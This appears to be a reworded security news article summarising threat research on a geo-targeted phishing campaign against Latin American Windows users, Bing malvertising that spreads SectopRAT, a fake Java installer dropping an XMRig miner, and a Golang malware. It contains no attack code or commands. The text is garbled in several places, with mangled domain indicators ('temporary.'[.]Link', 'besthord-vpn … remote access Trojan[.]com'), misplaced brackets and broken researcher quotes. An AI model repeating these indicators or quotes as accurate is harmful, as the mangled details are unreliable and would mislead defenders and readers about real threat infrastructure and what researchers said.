A new phishing campaign is targeting Latin America, delivering malicious payloads to Windows systems.
“The phishing email contained a ZIP file attachment that, when extracted, revealed an HTML file that resulted in the download of a malicious file posing as an invoice,” said Karla Agregado, a researcher at Trustwave SpiderLabs.
The company said the email message originated from an email address format using the domain name “temporary.”[.]Link” and lists Roundcube Webmail as the user agent string.
The HTML file point contains a link (“facturasmex[.]cloud”), displays an error message “This account has been suspended”, but when accessed from an IP address located in Mexico, a CAPTCHA verification page using Cloudflare Turnstile is loaded.
This step paves the way for redirection to another domain where the malicious RAR file is downloaded. The RAR file comes with a PowerShell script that collects system metadata and checks the infected computer for antivirus software.
It also contains several Base64-encoded strings designed to execute a PHP script to determine the user’s country and retrieve a ZIP file from Dropbox that contains “many highly suspicious files.”
Trustwave said the campaign has similarities to past Horabot malware campaigns targeting Spanish-speaking users in Latin America.
“Understandably, from a threat actor’s perspective, phishing campaigns always try different methods. [approaches] Hide any malicious activity and avoid immediate detection,” Agregado said.
“Using a newly created domain and making it accessible only in a specific country is another evasion technique. Especially when the domain name behaves differently depending on the target country.”
At the same time, Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users, which included false advertising for NordVPN, leading to the distribution of a malware called SectopRAT (aka ArechClient) via a fake website (“besthord-vpn” hosted on Dropbox) remote access Trojan[.]com”).
“Malvertising continues to demonstrate how easy it is to covertly install malware under the guise of popular software downloads,” said security researcher Jérôme Segura. “Threat actors are able to quickly and easily deploy infrastructure to bypass many content filters.”
According to the SonicWall report, a fake Java Access Bridge installer was also discovered that served as a conduit for deploying the open-source XMRig cryptocurrency miner.
The cybersecurity firm said it also discovered a Golang malware that “uses multiple geo-checks and publicly available packages before installing a root certificate into the Windows registry for HTTPS communication with the system. The system takes a screenshot.” [command-and-control server]”.
